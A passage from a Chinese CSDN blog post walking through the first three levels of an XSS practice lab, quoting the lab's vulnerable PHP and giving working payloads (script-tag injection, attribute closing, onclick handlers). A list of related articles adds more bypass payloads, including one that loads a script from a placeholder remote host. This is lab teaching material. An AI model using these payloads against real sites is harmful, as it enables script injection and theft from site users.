xss绕过尖括号和双括号_XSS过关wp(未完待续,目前13)

最新推荐文章于 2024-05-04 20:20:27 发布
最新推荐文章于 2024-05-04 20:20:27 发布
阅读量637 收藏 1
点赞数
文章标签: xss绕过尖括号和双括号
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42309456/article/details/112434819
版权

1.LEVEL 1

d5ea4b75b509f0c1dc22c14f470f6128.png

审计源码:

e14b08d241ac318dd984dd8c18da8de8.png

注意这几行:

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>

GET方式传送一个参数name ,然后直接拼接echo

所以给name直接传个最简单的xss弹窗即可:

0a96470ac7ca9837adb96cab00a814c2.png

2.LEVEL2 :搜索框bypass

5b4ae0282976698db8843eea37aca0cf.png

看url猜想一下应该和上面一题类似,不过:

1acca996782690f749ce39ddceb9eee1.png

审计源码:

0fa6bf9922debfb76c28ac486c2cb396.png

发现与level1相比,多了一个函数htmlspecialchars()。

查手册:

cd9d2d82843249c924cd78c43ff20dd6.png

也就是<,>,双引号等这些都用不了,会被echo直接当实体输出。不能再用echo构造弹框了。

继续看源码:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>

可以看到,input标签里的value没过滤:

<input name=keyword  value="'.$str.'">

类似闭合sql语句,直接给value传:"><scirpt>alert(1)</scirpt>

这样前面的“>闭合掉了input,且value为空。

即:<input name=keyword value=""><scirpt>alert(1)</scirpt>">

*:注意双引号是英文双引号。

**:其实也可以echo一些不用标签的xss语句。例如js的事件onclick()等。

e7758cf323ff38f114ee805b53b224da.png

3.LEVEL3

a8ac7ae963e62aaa3cdb5343e4fc943e.png

测试一下:

8cc636ccb97c09270ade2613030d224d.png

审计源码:

53c9b5b684dbbbfd2e2f476203e1ddb7.png

这回没空子钻了,input里面也被过滤了。老老实实过这个函数把。

上面提到了,js事件:

66f8dc5e93822622ca7cf6980676eaae.png

看一下代码:

<input name=keyword  value='".htmlspecialchars($str)."'>

思路类似:先单引号闭合value,然后我们用个js事件来构造xss,这里以鼠标点击事件onclick()为例子:

payload: ' οnclick='alert(1)

注意οnclick=后面的单引号,这样构造的html语句才完整

<input name=keyword value='' οnclick='alert(1)'>

传参后,点击一下搜索框,通过:

0eddfe37b9b0ee0e2845c04b570ffa56.png

4.LEVEL 4

2c5194418294167eb33c5c557f2ce5a2.png

审计源码:

最低0.47元/天 解锁文章
大脸猫000111
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS绕过技术
10-11
Cross-Site Scripting(XSS绕过技术,来自论坛:法克论坛,作者:bystand
xss过滤绕过方法总结
jinhezhai的博客
09-15 9901
xss注入常用语句、 1.<script>alert(1)</script> 2.<img src="#" onmouseover="alert(11)"> 3.<img src="#" onerror="alert('xss')"> 4.<svg onload=alert(1)> 5.<a href=javascript:alert(1)> 1.尝试双写绕过 2.大小写绕过、 3.js编码#unicode js的一种编码方式。 4.h
【应用安全——XSS】过滤圆括号尖括号绕过
热门推荐
Fly_鹏程万里
02-22 4万+
先看下程序大概写法: &lt;?php header("X-XSS-Protection:0"); $out = $_GET['code']; $out = str_replace("&lt;","&amp;lt;",$out); $out = str_replace("&gt;","&amp;gt;",$out); $out = str_replace(&quot
Xss漏洞常见绕过过滤攻击场景
最新发布
chaottop的博客
05-04 1665
在某些情况下,后台作的过滤非常简单,只对一些特殊的字符串作黑名单过滤,导致可直接通过字母大小写绕过后台的过滤。如下例子
(27)【xss绕过】一般测试步骤、绕过方法:触发事件、干扰、编码……
04-03 6057
XSS绕过-合集】
XSS绕过方式
OKAY_TC的博客
04-16 2923
记录挖洞过程中所遇到的XSS绕过 1. 过滤了<>尖括号: //原理:利用html以及js伪协议,当用户打开页面缓冲页面会自动获取焦点,从而触发js代码生成script标签,达到目的。 autofocus onfocus=location="javasCript:s=document.createElement("script");s.src="http://<ip>...
我的渗透笔记之XSS绕过技巧
xf555er的博客
03-03 1万+
1、单引号、双引号和尖括号之间的闭合。 有些标签例如,构造的payload应该为” >,那么组成的标签为<input value=""><script>alert(1)</script>" 2、尖括号被转义,利用注释符号和一些属性事件. 例如,构造payload为" οnclick=alert(1)//,组成的标签为<input value="" o...
记录几种XSS绕过方式1
08-03
本文主要记录了几种XSS绕过的方法,帮助开发者理解攻击者可能使用的技巧,提高网站的安全性。 1. 服务端全局替换为空的特性: 当网站的过滤机制将某些特定字符如"onerror"或"script"替换为空时,攻击者可以利用...
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序能充分地验证和转义...
使用无括号XSS绕过CSP策略研究 .pdf
09-05
标题中的“使用无括号XSS绕过CSP策略研究”是指在网络安全领域中,攻击者尝试利用一种特殊类型的跨站脚本(XSS)攻击来规避内容安全策略(Content Security Policy,简称CSP)的防御机制。CSP是一种有效的防止XSS...
自动绕过 XSS过滤器_Java_代码_相关文件_下载
07-12
绕过 XSS 过滤器 概述 snuck 是一个自动工具,其目标是通过基于反射上下文的专门注入来显着测试给定的 XSS 过滤器。这种方法采用 Selenium 来驱动 Web 浏览器来重现攻击者和受害者的行为。 更多详情、使用方法,...
xss绕过尖括号和双括号_强防御下的XSS绕过思路(一)白名单篇
weixin_39532754的博客
12-27 5340
前 言很多白帽子在挖掘XSS漏洞的时候,往往会遇到一个问题,就是明明发现这里的过滤有缺陷,但是就是没法成功的进行构造利用。可能会由于自身对XSS绕过的局限性思维,往往只会反复的去尝试各种不同 payload代码,寄希望于其中某一个可以绕过过滤。但是在遇到强有力的XSS防御措施下,往往只能是竹篮打水一场空。鉴于这种情况,这里主要分3个章节来简单的分享一些XSS绕过思路。【第一节】 白名单限...
XSS过滤绕过
qq_39654116的博客
01-17 4482
目录过滤测试示例输入在script标签中非常规的事件监听HREF内容可控变换JavaScript变换Vbscript变换输入在属性里JSONSVG标签浏览器bug常见标签利用link远程包含js文件javascript伪协议属性payload常用的payload各种alert伪协议Chrome XSS auditor bypass长度限制jquery sourceMappingURL图片名过期的payloadcssmarkdowniframeformmeta绕过过滤空格大小写混淆双写绕过字符拼接编码绕过编码
xss尖括号等被转义情况下的绕过测试
z1moq的博客
07-25 1万+
打开靶场 目标网站存在反射型xss漏洞,我们使用常用的方法进行测试 发现并无作用,打开网站源码查看问题情况 确实后端会将用户输入的数据无过滤直接返回前端,但是存在个别符号被转义的问题,导致无法正常弹窗 通过查找资料可知,可以通过使用三重url编码的方式绕过这一问题 尝试使用此方法进行绕过 emmmmmmm发现并不行 尝试使用编码绕过 发现也被转义了 既然无法实现转义的绕过,就再次仔细观察前端页面代码 发现在form表单中也会直接显示,并且发现 value 的值是由单引号闭合,且单引号在前几次测
xss绕过尖括号和双括号_xss防御及绕过-小记1
weixin_29315091的博客
12-23 2955
XSS搞安全的应该都很熟悉。本次并不是说其原理,仅是分享下在测试过程中遇到的案例。本人小白一枚,所以案例大佬们看着可能非常简单,就当是记录下自己笔记吧,不喜勿喷哈。。关于xss的防御,基本上都是采用输入过滤,输出编码。最近做的一个项目中的某个模块中,进行了输入过滤,采用跳转的形式。比如遇到<>或alert,响应包就会302跳转到固定网址。遇到这种黑名单的可以尝试各种绕过。有些输入是在i...
XSS绕过
m0_59855041的博客
09-04 182
alert(1)
XSS绕过技巧
weixin_52501704的博客
02-10 3411
XSS绕过技巧
xss绕过尖括号和双括号_XSS绕过filter高级技术part1
weixin_29903043的博客
12-23 1341
在如今的web时代,XSS攻击十分常见,针对xss攻击的防御也有不少,Filter就是一种用来防御xss攻击的最常见的手段,filter通常是采用黑名单的形式或者基于正则表达式来过滤。尽管如此,依然有很多技术可以用来绕过Filter。基本变形我们可以先从绕过相对简单的filter开始。根据Filter过滤规则复杂度的不同,绕过的难易程度肯定也不同,这些简单的过滤器还是比较容易绕过的,只要做一些基本...
XSS 绕过指南
weixin_51681694的博客
04-22 1401
因为各种原因,在此总结一下网络上的绕过方法以及个人的经验,会不断更新,若有错误请私信
xss绕过尖括号转义
10-12
3. 使用JavaScript编码:可以使用JavaScript编码来绕过尖括号的转义,例如使用“document.write('\x3cscript>alert('XSS')\x3c/script>')”来注入JavaScript代码。 4. 使用URL编码:可以使用URL编码来绕过尖括号的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值